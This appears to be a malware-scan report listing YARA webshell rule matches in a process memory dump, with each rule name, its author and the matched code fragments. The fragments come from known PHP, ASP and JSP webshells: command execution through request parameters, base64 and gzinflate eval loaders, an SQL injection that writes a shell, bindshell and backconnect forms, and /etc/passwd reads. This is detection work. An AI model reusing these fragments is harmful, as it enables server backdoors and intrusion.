- 0x3cbf1:$s1: $group["execute"] = ($mode & 00010)?"x":"-";
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0029 | Semi-Auto-generated - from files c99shell_v1.0.php.php.txt, c99php.txt, 1.txt, c2007.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3cde4:$s0: $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_php_webshells_2 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3cfdc:$s0: elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. I
- 0x3d02e:$s1: else {echo "<center><b>Unknown extension (".$ext."), please, select type ma
- 0x3d07e:$s3: $s = "!^(".implode("|",$tmp).")$!i";
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0030 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3d224:$s0: if ($total === FALSE) {$total = 0;}
- 0x3d24c:$s1: $free_percent = round(100/($total/$free),2);
- 0x3d27d:$s2: if (!$bool) {$bool = is_dir($letter.":\\");}
- 0x3d2ae:$s3: $bool = $isdiskette = in_array($letter,$safemode_diskettes);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0031 | Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3d476:$s0: $res = mssql_query("select * from r57_temp_table",$db);
- 0x3d4b2:$s2: 'eng_text30'=>'Cat file',
- 0x3d4d0:$s3: @mssql_query("drop table r57_temp_table",$db);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0032 | Semi-Auto-generated - from files nixrem.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3d671:$s0: $num = $nixpasswd + $nixpwdperpage;
- 0x3d699:$s1: $ret = posix_kill($pid,$sig);
- 0x3d6bb:$s2: if ($uid) {echo join(":",$uid)."<br>";}
- 0x3d6e7:$s3: $i = $nixpasswd;
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | DarkSecurityTeam_Webshell | Dark Security Team Webshell | Florian Roth | - 0x3d7d6:$s0: form method=post><input type=hidden name=""#"" value=Execute(Session(""#""))><input name=thePath value="""&HtmlEncode(Server.MapPath("."))&
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PHP_Cloaked_Webshell_SuperFetchExec | Looks like a webshell cloaked as GIF - http://goo.gl/xFvioC | Florian Roth | - 0x3d943:$s0: else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_RemExp_asp_php | PHP Webshells Github Archive - file RemExp.asp.php.txt | Florian Roth | - 0x3da56:$s0: lsExt = Right(FileName, Len(FileName) - liCount)
- 0x31d7d:$s7: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x3da8b:$s7: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x4da3a:$s7: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x3dadc:$s13: Response.Write Drive.ShareName & " [share]"
- 0x3db0d:$s19: If Request.QueryString("CopyFile") <> "" Then
- 0x3db40:$s20: <td width="40%" height="20" bgcolor="silver"> Name</td>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_dC3_Security_Crew_Shell_PRiV | PHP Webshells Github Archive - file dC3_Security_Crew_Shell_PRiV.php | Florian Roth | - 0x3dc6e:$s0: @rmdir($_GET['file']) or die ("[-]Error deleting dir!");
- 0x43776:$s0: @rmdir($_GET['file']) or die ("[-]Error deleting dir!");
- 0x3dcab:$s4: $ps=str_replace("\\","/",getenv('DOCUMENT_ROOT'));
- 0x3dce2:$s5: header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
- 0x3dd1d:$s15: search_file($_POST['search'],urldecode($_POST['dir']));
- 0x3dd5a:$s16: echo base64_decode($images[$_GET['pic']]);
- 0x3dd8a:$s20: if (isset($_GET['rename_all'])) {
- 0x43852:$s20: if (isset($_GET['rename_all'])) {
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_simattacker | PHP Webshells Github Archive - file simattacker.php | Florian Roth | - 0x3de7f:$s1: $from = rand (71,1020000000)."@"."Attacker.com";
- 0x3deb4:$s4: Turkish Hackers : WWW.ALTURKS.COM <br>
- 0x3dee5:$s5: Programer : SimAttacker - Edited By KingDefacer<br>
- 0x3df23:$s6: //fake mail = Use victim server 4 DOS - fake mail
- 0x3ef12:$s6: //fake mail = Use victim server 4 DOS - fake mail
- 0x3df5b:$s10: e-mail : kingdefacer@msn.com<br>
- 0x3df87:$s17: error_reporting(E_ERROR | E_WARNING | E_PARSE);
- 0x3ef92:$s17: error_reporting(E_ERROR | E_WARNING | E_PARSE);
- 0x3dfbc:$s18: echo "<font size='1' color='#999999'>Dont in windows";
- 0x3efc7:$s18: echo "<font size='1' color='#999999'>Dont in windows";
- 0x3dff8:$s20: $Comments=$_POST['Comments'];
- 0x3f003:$s20: $Comments=$_POST['Comments'];
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_DTool_Pro | PHP Webshells Github Archive - file DTool Pro.php | Florian Roth | - 0x3e0e5:$s1: function PHPget(){inclVar(); if(confirm("O PHPget agora oferece uma lista pront
- 0x3e139:$s2: <font size=3>by r3v3ng4ns - revengans@gmail.com </font>
- 0x3e175:$s3: function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDig
- 0x3e1c9:$s11: //Turns the 'ls' command more usefull, showing it as it looks in the shell
- 0x3e219:$s13: if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
- 0x3e269:$s14: //To keep the changes in the url, when using the 'GET' way to send php variables
- 0x3e2bf:$s16: function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite
- 0x3e313:$s18: if(empty($fu)) $fu = @$_GET['fu'];
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_ironshell | PHP Webshells Github Archive - file ironshell.php | Florian Roth | - 0x3e405:$s0: <title>'.getenv("HTTP_HOST").' ~ Shell I</title>
- 0x3e43a:$s2: $link = mysql_connect($_POST['host'], $_POST['username'], $_POST
- 0x3e47f:$s4: error_reporting(0); //If there is an error, we'll show it, k?
- 0x3e4c1:$s8: print "<form action=\"".$me."?p=chmod&file=".$content."&d
- 0x3e500:$s15: if(!is_numeric($_POST['timelimit']))
- 0x3e52a:$s16: if($_POST['chars'] == "9999")
- 0x3e54d:$s17: <option value=\"az\">a - zzzzz</option>
- 0x3e57a:$s18: print shell_exec($command);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_indexer_asp_php | PHP Webshells Github Archive - file indexer.asp.php.txt | Florian Roth | - 0x3e671:$s0: <meta http-equiv="Content-Language" content="tr">
- 0x3e6a7:$s1: <title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>
- 0x3e6e2:$s2: <form action="?Gonder" method="post">
- 0x3e70c:$s4: <form action="?oku" method="post">
- 0x3e733:$s7: var message="SaNaLTeRoR -
- 0x3e752:$s8: nDexEr - Reader"
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_toolaspshell | PHP Webshells Github Archive - file toolaspshell.php | Florian Roth | - 0x3e838:$s0: cprthtml = "<font face='arial' size='1'>RHTOOLS 1.5 BETA(PVT) Edited By KingDef
- 0x3e88d:$s12: barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1
- 0x3e8ce:$s20: destino3 = folderItem.path & "\index.asp"
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_b374k_mini_shell_php_php | PHP Webshells Github Archive - file b374k-mini-shell-php.php.php | Florian Roth | - 0x3e9e5:$s0: @error_reporting(0);
- 0x3e9fe:$s2: @eval(gzinflate(base64_decode($code)));
- 0x3ea2a:$s3: @set_time_limit(0);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Sincap_1_0 | PHP Webshells Github Archive - file Sincap 1.0.php | Florian Roth | - 0x3eb10:$s4: </font></span><a href="mailto:shopen@aventgrup.net">
- 0x3eb49:$s5: <title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) B
- 0x3eb87:$s9: </span>Avrasya Veri ve NetWork Teknolojileri Geli
- 0x3ebbe:$s12: while (($ekinci=readdir ($sedat))){
- 0x3ebe7:$s19: $deger2= "$ich[$tampon4]";
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_b374k_php | PHP Webshells Github Archive - file b374k.php.php | Florian Roth | - 0x3ecd1:$s0: // encrypt your password to md5 here http://kerinci.net/?x=decode
- 0x3ed17:$s6: // password (default is: b374k)
- 0x3ed3b:$s8: //******************************************************************************
- 0x3ed90:$s9: // b374k 2.2
- 0x3eda2:$s10: eval("?>".gzinflate(base64_decode(
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_SimAttacker___Vrsion_1_0_0___priv8_4_My_friend | PHP Webshells Github Archive - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php | Florian Roth | - 0x3eede:$s4: Iranian Hackers : WWW.SIMORGH-EV.COM <br>
- 0x3df23:$s5: //fake mail = Use victim server 4 DOS - fake mail
- 0x3ef12:$s5: //fake mail = Use victim server 4 DOS - fake mail
- 0x3ef4a:$s10: <a style="TEXT-DECORATION: none" href="http://www.simorgh-ev.com">
- 0x3df87:$s16: error_reporting(E_ERROR | E_WARNING | E_PARSE);
- 0x3ef92:$s16: error_reporting(E_ERROR | E_WARNING | E_PARSE);
- 0x3dfbc:$s17: echo "<font size='1' color='#999999'>Dont in windows";
- 0x3efc7:$s17: echo "<font size='1' color='#999999'>Dont in windows";
- 0x3dff8:$s19: $Comments=$_POST['Comments'];
- 0x3f003:$s19: $Comments=$_POST['Comments'];
- 0x3f026:$s20: Victim Mail :<br><input type='text' name='to' ><br>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_h4ntu_shell__powered_by_tsoi_ | PHP Webshells Github Archive - file h4ntu shell [powered by tsoi | unknown | - 0x3f152:$s11: <title>h4ntu shell [powered by tsoi]</title>
- 0x3f184:$s13: $cmd = $_POST['cmd'];
- 0x3f5be:$s13: $cmd = $_POST['cmd'];
- 0x3f19f:$s16: $uname = posix_uname( );
- 0x30ec8:$s17: if(!$whoami)$whoami=exec("whoami");
- 0x3f1bd:$s17: if(!$whoami)$whoami=exec("whoami");
- 0x3f1e6:$s18: echo "<p><font size=2 face=Verdana><b>This Is The Server Information</b></font>
- 0x3f23b:$s20: ob_end_clean();
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_MyShell | PHP Webshells Github Archive - file MyShell.php | Florian Roth | - 0x3f324:$s3: <title>MyShell error - Access Denied</title>
- 0x3f355:$s4: $adminEmail = "youremail@yourserver.com";
- 0x3f383:$s5: //A workdir has been asked for - we chdir to that dir.
- 0x3f3be:$s6: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x4541d:$s6: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x3f40f:$s13: #$autoErrorTrap Enable automatic error traping if command returns error.
- 0x3f45d:$s14: /* No work_dir - we chdir to $DOCUMENT_ROOT */
- 0x3f491:$s19: #every command you excecute.
- 0x3f4b3:$s20: <form name="shell" method="post">
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_pws | PHP Webshells Github Archive - file pws.php | Florian Roth | - 0x3f5a6:$s6: if ($_POST['cmd']){
- 0x3f184:$s7: $cmd = $_POST['cmd'];
- 0x3f5be:$s7: $cmd = $_POST['cmd'];
- 0x3f5d9:$s10: echo "FILE UPLOADED TO $dez";
- 0x3f5fc:$s11: if (file_exists($uploaded)) {
- 0x3f61f:$s12: copy($uploaded, $dez);
- 0x3f63b:$s17: passthru($cmd);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_reader_asp_php | PHP Webshells Github Archive - file reader.asp.php.txt | Florian Roth | - 0x3f724:$s5: ster" name=submit> </Font> <a href=mailto:mailbomb@hotmail
- 0x3f779:$s12: HACKING
- 0x3f788:$s16: FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT:
- 0x3f7de:$s20: PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKG
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 | PHP Webshells Github Archive - file Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php | Florian Roth | - 0x3f93c:$s1: <option value="/etc/passwd">Get /etc/passwd</option>
- 0x41aae:$s1: <option value="/etc/passwd">Get /etc/passwd</option>
- 0x3f975:$s6: by PHP Emperor<xb5@hotmail.com>
- 0x41b35:$s6: by PHP Emperor<xb5@hotmail.com>
- 0x3f999:$s9: ".htmlspecialchars($file)." has been already loaded. PHP Emperor <xb5@hotmail.
- 0x3f9ed:$s11: die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
- 0x3fa21:$s15: if(empty($_GET['file'])){
- 0x3fa40:$s16: echo "<head><title>Safe Mode Shell</title></head>";
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit | PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php | Florian Roth | - 0x3fba8:$s4: $liz0zim=shell_exec($_POST[liz0]);
- 0x3fbd0:$s6: $liz0=shell_exec($_POST[baba]);
- 0x3fbf5:$s9: echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass E
- 0x3fc4a:$s12: :=) :</font><select size="1" name="liz0">
- 0x21a67:$s13: <option value="cat /etc/passwd">/etc/passwd</option>
- 0x3fc7a:$s13: <option value="cat /etc/passwd">/etc/passwd</option>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_backdoor | PHP Webshells Github Archive - file php-backdoor.php | Florian Roth | - 0x3fd84:$s5: http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
- 0x3fdc4:$s6: // a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombi
- 0x3fe1a:$s11: if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
- 0x3fe5b:$s13: else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
- 0x245aa:$s15: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
- 0x3fe9e:$s15: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Worse_Linux_Shell | PHP Webshells Github Archive - file Worse Linux Shell.php | Florian Roth | - 0x3ffcc:$s4: if( $_POST['_act'] == "Upload!" ) {
- 0x3fff4:$s5: print "<center><h1>#worst @dal.net</h1></center>";
- 0x4002b:$s7: print "<center><h1>Linux Shells</h1></center>";
- 0x4005f:$s8: $currentCMD = "ls -la";
- 0x4007c:$s14: print "<tr><td><b>System type:</b></td><td>$UName</td></tr>";
- 0x400bf:$s19: $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_pHpINJ | PHP Webshells Github Archive - file pHpINJ.php | Florian Roth | - 0x401cd:$s3: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
- 0x505a0:$s3: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
- 0x40211:$s10: <form action = "<?php echo "$_SERVER[PHP_SELF]" ; ?>" method = "post">
- 0x4025d:$s11: $sql = "0' UNION SELECT '0' , '<? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 IN
- 0x402b1:$s13: Full server path to a writable file which will contain the Php Shell <br />
- 0x40302:$s14: $expurl= $url."?id=".$sql ;
- 0x40323:$s15: <header>|| .::News PHP Shell Injection::. ||</header> <br /> <br />
- 0x40370:$s16: <input type = "submit" value = "Create Exploit"> <br /> <br />
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_NGH | PHP Webshells Github Archive - file NGH.php | Florian Roth | - 0x40480:$s0: <title>Webcommander at <?=$_SERVER["HTTP_HOST"]?></title>
- 0x404be:$s2: /* Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition :p */
- 0x316c5:$s5: <form action=<?=$script?>?act=bindshell method=POST>
- 0x404fc:$s5: <form action=<?=$script?>?act=bindshell method=POST>
- 0x40535:$s9: <form action=<?=$script?>?act=backconnect method=POST>
- 0x40571:$s11: <form action=<?=$script?>?act=mkdir method=POST>
- 0x405a7:$s16: die("<font color=#DF0000>Login error</font>");
- 0x405db:$s20: <b>Bind /bin/bash at port: </b><input type=text name=port size=8>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_matamu | PHP Webshells Github Archive - file matamu.php | Florian Roth | - 0x406f4:$s2: $command .= ' -F';
- 0x4070b:$s3: /* We try and match a cd command. */
- 0x40734:$s4: directory... Trust me - it works :-) */
- 0x43f08:$s4: directory... Trust me - it works :-) */
- 0x40760:$s5: $command .= " 1> $tmpfile 2>&1; " .
- 0x40789:$s10: $new_dir = $regs[1]; // 'cd /something/...'
- 0x407ba:$s16: /* The last / in work_dir were the first charecter.
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_ru24_post_sh | PHP Webshells Github Archive - file ru24_post_sh.php | Florian Roth | - 0x408c3:$s1: http://www.ru24-team.net
- 0x37cb2:$s4: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x408e0:$s4: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x37c81:$s6: Ru24PostWebShell
- 0x40932:$s6: Ru24PostWebShell
- 0x37d04:$s7: Writed by DreAmeRz
- 0x40947:$s7: Writed by DreAmeRz
- 0x4095e:$s9: $function=passthru; // system, exec, cmd
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_hiddens_shell_v1 | PHP Webshells Github Archive - file hiddens shell v1.php | Florian Roth | - 0x35973:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
- 0x40a64:$s0: <?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_c99_madnet | PHP Webshells Github Archive - file c99_madnet.php | Florian Roth | - 0x40b86:$s0: $md5_pass = ""; //If no pass then hash
- 0x422ee:$s0: $md5_pass = ""; //If no pass then hash
- 0x240f3:$s1: eval(gzinflate(base64_decode('
- 0x24f45:$s1: eval(gzinflate(base64_decode('
- 0x312d2:$s1: eval(gzinflate(base64_decode('
- 0x3268d:$s1: eval(gzinflate(base64_decode('
- 0x40bb1:$s1: eval(gzinflate(base64_decode('
- 0x42319:$s1: eval(gzinflate(base64_decode('
- 0x40bd4:$s2: $pass = "pass"; //Pass
- 0x40bf0:$s3: $login = "user"; //Login
- 0x40c0d:$s4: //Authentication
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_c99_locus7s | PHP Webshells Github Archive - file c99_locus7s.php | Florian Roth | - 0x40cfe:$s8: $encoded = base64_encode(file_get_contents($d.$f));
- 0x40d37:$s9: $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y
- 0x40d82:$s10: else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sq
- 0x40dcd:$s11: $c99sh_sourcesurl = "http://locus7s.com/"; //Sources-server
- 0x40e0f:$s19: $nixpwdperpage = 100; // Get first N lines from /etc/passwd
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_JspWebshell_1_2 | PHP Webshells Github Archive - file JspWebshell_1.2.php | Florian Roth | - 0x40f27:$s0: System.out.println("CreateAndDeleteFolder is error:"+ex);
- 0x44417:$s0: System.out.println("CreateAndDeleteFolder is error:"+ex);
- 0x40f66:$s1: String password=request.getParameter("password");
- 0x40f9c:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x44456:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x40fec:$s7: String editfile=request.getParameter("editfile");
- 0x41022:$s8: //String tempfilename=request.getParameter("file");
- 0x2a58f:$s12: password = (String)session.getAttribute("password");
- 0x4105b:$s12: password = (String)session.getAttribute("password");
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_safe0ver | PHP Webshells Github Archive - file safe0ver.php | Florian Roth | - 0x4115d:$s3: $scriptident = "$scriptTitle By Evilc0der.com";
- 0x41191:$s4: while (file_exists("$lastdir/newfile$i.txt"))
- 0x411c3:$s5: else { /* Then it must be a File... --> */
- 0x411f7:$s7: $contents .= htmlentities( $line ) ;
- 0x41220:$s8: <br><p><br>Safe Mode ByPAss<p><form method="POST">
- 0x41258:$s14: elseif ( $cmd=="upload" ) { /* Upload File form --> */
- 0x46f1d:$s14: elseif ( $cmd=="upload" ) { /* Upload File form --> */
- 0x4129a:$s20: /* End of Actions --> */
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Uploader | PHP Webshells Github Archive - file Uploader.php | Florian Roth | - 0x328fe:$s1: move_uploaded_file($userfile, "entrika.php");
- 0x41385:$s1: move_uploaded_file($userfile, "entrika.php");
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_kral | PHP Webshells Github Archive - file kral.php | Florian Roth | - 0x41487:$s1: $adres=gethostbyname($ip);
- 0x414a6:$s3: curl_setopt($ch,CURLOPT_POSTFIELDS,"domain=".$site);
- 0x414df:$s4: $ekle="/index.php?option=com_user&view=reset&layout=confirm";
- 0x41522:$s16: echo $son.' <br> <font color="green">Access</font><br>';
- 0x41560:$s17: <p>kodlama by <a href="mailto:priv8coder@gmail.com">BLaSTER</a><br /
- 0x415aa:$s20: <p><strong>Server listeleyici</strong><br />
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_cgitelnet | PHP Webshells Github Archive - file cgitelnet.php | Florian Roth | - 0x416a6:$s9: # Author Homepage: http://www.rohitab.com/
- 0x416d6:$s10: elsif($Action eq "command") # user wants to run a command
- 0x41715:$s18: # in a command line on Windows NT.
- 0x4173d:$s20: print "Transfered $TargetFileSize Bytes.<br>";
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_simple_backdoor | PHP Webshells Github Archive - file simple-backdoor.php | Florian Roth | - 0x33e57:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x41847:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x41f6e:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x41886:$s1: http://michaeldaw.org 2006 -->
- 0x41fad:$s1: http://michaeldaw.org 2006 -->
- 0x33e96:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x418b6:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x41fdd:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x418fb:$s3: echo "</pre>";
- 0x41916:$s4: $cmd = ($_REQUEST['cmd']);
- 0x4193d:$s5: echo "<pre>";
- 0x225b6:$s6: if(isset($_REQUEST['cmd'])){
- 0x41957:$s6: if(isset($_REQUEST['cmd'])){
- 0x42022:$s6: if(isset($_REQUEST['cmd'])){
- 0x41978:$s7: die;
- 0x41989:$s8: system($cmd);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_2 | PHP Webshells Github Archive - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php | Florian Roth | - 0x3f93c:$s1: <option value="/etc/passwd">Get /etc/passwd</option>
- 0x41aae:$s1: <option value="/etc/passwd">Get /etc/passwd</option>
- 0x41ae7:$s3: xb5@hotmail.com</FONT></CENTER></B>");
- 0x41b12:$s4: $v = @ini_get("open_basedir");
- 0x3f975:$s6: by PHP Emperor<xb5@hotmail.com>
- 0x41b35:$s6: by PHP Emperor<xb5@hotmail.com>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_NTDaddy_v1_9 | PHP Webshells Github Archive - file NTDaddy v1.9.php | Florian Roth | - 0x41c2a:$s2: | -obzerve : mr_o@ihateclowns.com |
- 0x41c56:$s6: szTempFile = "C:\" & oFileSys.GetTempName( )
- 0x42457:$s6: szTempFile = "C:\" & oFileSys.GetTempName( )
- 0x41c88:$s13: <form action=ntdaddy.asp method=post>
- 0x41cb3:$s17: response.write("<ERROR: THIS IS NOT A TEXT FILE>")
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_lamashell | PHP Webshells Github Archive - file lamashell.php | Florian Roth | - 0x41db5:$s0: if(($_POST['exe']) == "Execute") {
- 0x41ddc:$s8: $curcmd = $_POST['king'];
- 0x41dfb:$s16: "http://www.w3.org/TR/html4/loose.dtd">
- 0x41e28:$s18: <title>lama's'hell v. 3.0</title>
- 0x41e4f:$s19: _|_ O _ O _|_
- 0x41e6a:$s20: $curcmd = "ls -lah";
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Simple_PHP_backdoor_by_DK | PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php | Florian Roth | - 0x33e57:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x41847:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x41f6e:$s0: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x41886:$s1: http://michaeldaw.org 2006 -->
- 0x41fad:$s1: http://michaeldaw.org 2006 -->
- 0x33e96:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x418b6:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x41fdd:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x225b6:$s6: if(isset($_REQUEST['cmd'])){
- 0x41957:$s6: if(isset($_REQUEST['cmd'])){
- 0x42022:$s6: if(isset($_REQUEST['cmd'])){
- 0x225d7:$s8: system($cmd);
- 0x41991:$s8: system($cmd);
- 0x42043:$s8: system($cmd);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Moroccan_Spamers_Ma_EditioN_By_GhOsT | PHP Webshells Github Archive - file Moroccan Spamers Ma-EditioN By GhOsT.php | Florian Roth | - 0x42156:$s4: $content = chunk_split(base64_encode($content));
- 0x4218d:$s12: print "Sending mail to $to....... ";
- 0x421b8:$s16: if (!$from && !$subject && !$message && !$emaillist){
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_C99madShell_v__2_0_madnet_edition | PHP Webshells Github Archive - file C99madShell v. 2.0 madnet edition.php | Florian Roth | - 0x40b86:$s0: $md5_pass = ""; //If no pass then hash
- 0x422ee:$s0: $md5_pass = ""; //If no pass then hash
- 0x240f3:$s1: eval(gzinflate(base64_decode('
- 0x24f45:$s1: eval(gzinflate(base64_decode('
- 0x312d2:$s1: eval(gzinflate(base64_decode('
- 0x3268d:$s1: eval(gzinflate(base64_decode('
- 0x40bb1:$s1: eval(gzinflate(base64_decode('
- 0x42319:$s1: eval(gzinflate(base64_decode('
- 0x4233c:$s2: $pass = ""; //Pass
- 0x42354:$s3: $login = ""; //Login
- 0x24f21:$s4: //Authentication
- 0x40c1a:$s4: //Authentication
- 0x4236d:$s4: //Authentication
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_CmdAsp_asp_php | PHP Webshells Github Archive - file CmdAsp.asp.php.txt | Florian Roth | - 0x41c56:$s1: szTempFile = "C:\" & oFileSys.GetTempName( )
- 0x42457:$s1: szTempFile = "C:\" & oFileSys.GetTempName( )
- 0x42488:$s4: ' Author: Maceo <maceo @ dogmile.com>
- 0x424b2:$s5: ' -- Use a poor man's pipe ... a temp file -- '
- 0x424e6:$s6: ' --------------------o0o--------------------
- 0x42518:$s8: ' File: CmdAsp.asp
- 0x42530:$s11: <-- CmdAsp.asp -->
